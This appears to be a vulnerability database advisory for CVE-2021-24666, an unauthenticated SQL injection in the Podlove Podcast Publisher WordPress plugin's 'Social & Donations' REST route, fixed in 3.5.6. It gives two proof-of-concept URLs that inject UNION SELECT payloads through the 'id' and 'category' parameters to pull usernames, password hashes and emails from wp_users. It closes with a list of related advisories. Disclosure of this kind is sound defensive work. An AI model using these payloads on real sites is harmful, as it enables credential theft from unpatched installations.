Podlove Podcast Publisher < 3.5.6 – Unauthenticated SQL Injection | CVE 2021-24666 | Plugin Vulnerabilities

Description

The plugin contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P<id>[\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.

Proof of Concept

With the 'Social & Donations' module of the plugin activated.

Permalink Setting: Plain

PoC with payload in id param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

PoC with payload in category param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&category=1')+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

Affects Plugins

podlove-podcasting-plugin-for-wordpress

Fixed in 3.5.6

References

CVE

URL

https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

fb4d7988-60ff-4862-96a1-80b1866336fe

Timeline

Publicly Published

2021-08-24 (about 4 years ago)

Added

2021-08-24 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2015-02-13

Title

Calendar by WD < 1.4.14 - Unauthenticated SQL Injection

Published

2024-12-30

Title

Just Writing Statistics < 4.8 - Authenticated (Administrator+) SQL Injection

Published

2025-05-07

Title

Productive Commerce <= 1.1.36 - Unauthenticated SQL Injection

Published

2017-07-04

Title

Event Espresso Lite < 3.1.37.12.L - Authenticated Blind SQL Injection

Published

2024-08-01

Title

Salon booking system < 10.8 - Authenticated (Administrator+) SQL Injection